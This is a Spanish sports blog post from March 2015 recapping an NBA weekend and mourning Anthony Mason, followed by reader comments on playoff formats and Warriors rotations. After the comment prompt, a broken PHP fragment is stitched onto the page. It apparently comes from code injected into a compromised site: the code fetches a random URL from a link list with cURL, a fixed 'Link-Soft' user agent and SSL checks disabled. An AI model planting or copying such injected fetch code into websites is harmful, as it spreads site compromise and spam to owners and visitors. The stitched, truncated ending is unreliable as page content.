Informe del fin de semana: Otra prematura pérdida

02 de March de 2015 por TheDeerHunter

Otro fin de semana en el que tenemos que lamentar la prematura pérdida de un ilustre ex-jugador como es Anthony Mason. Fue miembro imprescindible de aquellos durísimos Knicks que cayeron en el 7º de la final de 1994 ante The Dream y los suyos, representando como nadie la filosofía de trabajo que definía a aquel equipo. Siempre me quedará la sensación de que tenían nivel para haber llegado a ser campeones. La existencia de un tal Michael Jordan les privó de muchas oportunidades.

En términos deportivos, extenuante jornada de viernes con 14 partidos en liza. Los líderes de ambas conferencias sacaron adelante sus compromisos, los Hawks lograban doblegar a unos Magic más combativos de la cuenta y los Warriors hacían lo propio con unos Raptors en seria crisis existencial. En cambio, los Grizzlies pagaron su mal partido ante Clippers con el consiguiente recorte de distancias con sus perseguidores y es que los Rockets aprovecharon la mejor actuación del año de Terrence Jones para vencer a los Nets y los Blazers se sobrepusieron al descomunal triple doble de Westbrook y frenaron a los Thunder. Con el que fue su tercer triple doble consecutivo, Russell Westbrook ha irrumpido con fuerza en las quinielas por el MVP. En el mes de febrero el animalico ha promediado 31’2 puntos, 9’1 rebotes, 10’3 asistencias y 1’6 robos.

Antes, los Pacers habían disfrutado de la ausencia de LeBron para llevarse el gato al agua, Nerlens Noel lideraba a los Sixers ante unos Wizards que no levantan cabeza y los recién llegados Isaiah Thomas, Jonas Jerebko y Jae Crowder fueron los héroes de una remontada de 16 puntos de los Celtics frente a Hornets. Por su parte, Andrea Bargnani recordó al de sus mejores tardes (ha llovido ya) en la victoria con prórroga de los Knicks en Detroit, Jimmy Butler volvió a salirse en la victoria de los Bulls ante Minnesota y sin Davis pero con un gran Alexis Ajinca los Pelicans doblegaron a los Heat. Los Spurs rompieron su mala racha ante Kings. Jazz ganaron a Nuggets y los Lakers, con el estelar dúo Ellington-Clarkson a la cabeza ganaron a Milwaukee.

El sábado recuperamos la mejor versión de Marc Gasol para que los Grizzlies evitaran un nuevo tropiezo ante los Wolves de Ricky Rubio. Los Hawks, a pesar de dar descanso a 4 de sus jugadores clave, fueron capaces de ganar a los Heat aunque de manera más que apurada. Asistimos también a a sorprendente 2ª victoria consecutiva de los Knicks, ésta ante unos Raptors que ya llevan 5 derrotas consecutivas. También en el Este, victoria meritoria de los Nets en Dallas que les situaba momentánamente en zona de postemporada, y victoria también de los Wizards que rompían su mala racha venciendo a unos Pistons que parecen desinflarse definitivamente. Otros que parecen pasar un mini-pájara son los Bucks que cayeron ante los Jazz en un buen partido de Trey Burke. Finalmente, en Phoenix, los campeones frustraron buena parte de las esperanzas que aún les quedaban a los Suns de no irse de vacaciones justo al final de la regular. Los locales anotaron solo 24 puntos en toda la primera mitad y Brandon Knight se retiró lesionado en el segundo cuarto.

La jornada del domingo se abría con un interesantísimo Clippers – Bulls que acabaron llevándose los visitantes gracias a un DeAndre Jordan que se puso las botas bajo los tableros (26 rebotes nada menos). Para no bajar el nivel, seguidamente nos pudimos llevar a la boca un Cavaliers – Rockets que reivindicó a James Harden como candidato a MVP y despertó los viejos fantasmas del clutch time en Lebron James. Los locales acabaron llevándose el encuentro en la prórroga gracias, en parte, a dos tiros libres que falló Lebron a falta de 4 segundos para el final del partido. La presión que suponía la victoria de los Rockets no hizo mella en los Blazers que se impusieron a domicilio a los Kings gracias a un buen último cuarto de Damian Lillard. Tampoco fallaron los Warriors aunque estos sí que tuvieron que sudar la gota gorda para imponerse a unos Celtics que fueron por delante prácticamente todo el partido y llegaron a ganar de 26 puntos. Oklahoma City Thunder también ganó a pesar de contar ni con Durant ni con Russell Westbrook, que a pesar de tener que pasar por el quirófano para reparar el arco zigomático de su mejilla derecha no va a perderse demasiados partidos. Los Thunder siguen octavos pero no se pueden dormir porque los Pelicans han encadenado 5 victorias consecutivas, todas sin Anthony Davis, Jrue Holiday y Ryan Anderson, algo difícilmente explicable. Y en la lucha por los PO del Este, victoria de los Bobcats sobre los Magic y de los Pacers sobre los Sixers. En estos momentos Indiana está en puestos de playoffs y ya se rumorea que Paul George podría volver durante el mes de marzo. ¡Al loro!

Comenta

7 comentarios a esta entrada

  1. Albertis dice:
    #1

    Buenas, sé que no viene mucho a cuento pero con respecto al debate de la diferencia de nivel entre una y otra conferencia, pensáis que se debería de modificar el sistema de playoffs?? No he mirado históricamente el nivel / desnivel entre una u otra, e imagino que habrá habido épocas de nivel similiar con otras de gran diferencia entre ellas (lógicamente ya que es algo aleatorio), pero yo lo sigo viendo muy injusto, el sistema de emparejar a los 16 mejores equipos todos contra todos en playoffs (respetando obviamente el orden clasificatorio) es algo tan descabellado?? Imagino que los desplazamientos serían un handicap por la lejanía pero lo veo infinitamente mas justo.
    El decir que los Cavs llegarán a la final de la conferencia este con relativa facilidad me parece increíble viendo lo que tendrán que superar los finalistas de la conferencia oeste para lo mismo.
    Un saludo.

      Citar

  2. Futurman dice:
    #2

    No solo los desplazamientos, si no que cada equipo juega más partidos contra los de su conferencia; y eso se nota a la hora de hinchar números. Algo como un sistema mixto, que lleve a los campeones de división junto a los mejores equipos es lo que proponía Silver… yo no opino.

      Citar

  3. Ruxixón dice:
    #3

    Antes o después se instaurará ese sistema,sobre todo si sigue la tendencia.Un Este al nivel del Oeste te calla todo esto,pero llevamos unos años que nanai,y con los rumores sobre el cambio del sistema clasificatorio unas 2-3 temporadas.

    Del post del fin de semana,LeBron se equivocó a la hora de jugar con sus compañeros.Love jugó muy buen partido,aportando no sólo en el triple y podía haber sido de gran ayuda en el último cuarto + prórroga,si se hubiera jugado por dentro con él.Creo que los Cavaliers desaprovecharon la oportunidad cuando McHale metió a Josh Smith.Con Love más cenjtrado en las ayudas a LeBron sobre Harden se la podían jugar a que Smith asumiese más tiros.Luego en defensa nada,Ariza y Smith sobre LeBron y ahí es donde debería haber cedido mayor protagonismo al resto.Aún así se estuvo a punto,una pena la horrible serie de tiros libres.

      Citar

  4. Futurman dice:
    #4

    De todos modos, Lebron se desquició cuando Harden le mete la patada en los huevos. Con Harden expulsado el último cuarto hubiese sido un paseo.

      Citar

  5. will smith dice:
    #5

    En el partido de ayer de Golden State contra Boston, Green 43 min,Lee 7 min, y speights 0 min.Va todo con viento a favor pero ultimamente no comparto las rotaciones de kerr.Luego el tema David Lee no me cuadra.Yo admito que a final de año no salen las cuentas y los Warriors se queden con Green que es mas joven y barato pero a día de hoy no entiendo que juegue tampoco cuando se le ve que fisicamente está bién.El año pasado sin ir mas lejos terminó con 18 ptos 9 rebotes y 52% en tiros de campo.Green este año son 11 ptos pero con un 43% de tiros de campo.Me da que David Lee es buena gente porque con cualquier otro all star Kerr ya tendría un lio en el vestuario.

      Citar

  6. txusma dice:
    #6

    Creo que todo responde a una palabra: defensa.

      Citar

  7. king rex dice:
    #7

    Bueno yo creo que la defensa de Green está un poco sobrevalorada.Es cierto que tiene mucha intensidad pero en el puesto de cuatro casi todos los contrarios son más grandes que él.Contra Cleveland, Love que tampodo se prodiga mucho le metio un par de medios ganchos en el poste.En cualquier caso soy un poco pesado pero admitendo todas las bondades del juego de Green,no veo lógico que juegue 43 min y Lee 7.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>